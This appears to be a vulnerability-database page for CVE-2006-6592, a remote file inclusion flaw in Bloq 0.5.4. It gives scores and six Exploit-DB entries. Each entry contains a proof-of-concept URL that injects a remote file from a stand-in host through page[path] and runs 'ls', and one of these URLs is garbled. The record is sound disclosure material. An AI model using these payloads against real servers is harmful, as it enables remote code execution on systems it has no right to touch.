CVE-2006-6592
published 2006-12-15CVE-2006-6592: Multiple PHP remote file inclusion vulnerabilities in Bloq 0.5.4 allow remote attackers to execute arbitrary PHP code via a URL in the page[path] parameter to…
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.52%
82.9th percentile
Multiple PHP remote file inclusion vulnerabilities in Bloq 0.5.4 allow remote attackers to execute arbitrary PHP code via a URL in the page[path] parameter to (1) index.php, (2) admin.php, (3) rss.php, (4) rdf.php, (5) rss2.php, or (6) files/mainfile.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php | bloq | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Bloq 0.5.4 - 'rdf.php?page[path]' Remote File Inclusion
exploitdb·2006-10-13
CVE-2006-6592 Bloq 0.5.4 - 'rdf.php?page[path]' Remote File Inclusion
Bloq 0.5.4 - 'rdf.php?page[path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/20512/info
Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Version 0.5.4 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/[PATHTOSCRİPT]/rdf.php?page[path]=http://www.example.com/cmd.gif?&cmd=ls
Exploit-DB
Bloq 0.5.4 - 'index.php?page[path]' Remote File Inclusion
exploitdb·2006-10-13
CVE-2006-6592 Bloq 0.5.4 - 'index.php?page[path]' Remote File Inclusion
Bloq 0.5.4 - 'index.php?page[path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/20512/info
Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Version 0.5.4 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/[PATHSCRİPT]/index.php?page[path]=http://www.example.com/cmd.gif?&cmd=ls
Exploit-DB
Bloq 0.5.4 - '/files/mainfile.php?page[path]' Remote File Inclusion
exploitdb·2006-10-13
CVE-2006-6592 Bloq 0.5.4 - '/files/mainfile.php?page[path]' Remote File Inclusion
Bloq 0.5.4 - '/files/mainfile.php?page[path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/20512/info
Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Version 0.5.4 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/[PATHTOSCRİPT]/files/mainfile.php?page[path]=http://www.example.com/cmd.gif?&cmd=ls
Exploit-DB
Bloq 0.5.4 - 'rss2.php?page[path]' Remote File Inclusion
exploitdb·2006-10-13
CVE-2006-6592 Bloq 0.5.4 - 'rss2.php?page[path]' Remote File Inclusion
Bloq 0.5.4 - 'rss2.php?page[path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/20512/info
Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Version 0.5.4 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/[PATHTOSCRİPT]/rss2.php?page[path]=http://www.example.com/cmd.gif?&cmd=l10:32
Exploit-DB
Bloq 0.5.4 - 'admin.php?page[path]' Remote File Inclusion
exploitdb·2006-10-13
CVE-2006-6592 Bloq 0.5.4 - 'admin.php?page[path]' Remote File Inclusion
Bloq 0.5.4 - 'admin.php?page[path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/20512/info
Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Version 0.5.4 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/[PATHTOSCRİPT]/admin.php?page[path]=http://www.example.com/cmd.gif?&cmd=ls
Exploit-DB
Bloq 0.5.4 - 'rss.php?page[path]' Remote File Inclusion
exploitdb·2006-10-13
CVE-2006-6592 Bloq 0.5.4 - 'rss.php?page[path]' Remote File Inclusion
Bloq 0.5.4 - 'rss.php?page[path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/20512/info
Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Version 0.5.4 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/[PATHTOSCRİPT]/rss.php?page[path]=http://www.example.com/cmd.gif?&cmd=ls
No writeups or analysis indexed.
http://securityreason.com/securityalert/2039http://www.securityfocus.com/archive/1/448603/100/0/threadedhttp://www.securityfocus.com/bid/20512https://exchange.xforce.ibmcloud.com/vulnerabilities/29585http://securityreason.com/securityalert/2039http://www.securityfocus.com/archive/1/448603/100/0/threadedhttp://www.securityfocus.com/bid/20512https://exchange.xforce.ibmcloud.com/vulnerabilities/29585
2006-12-15
Published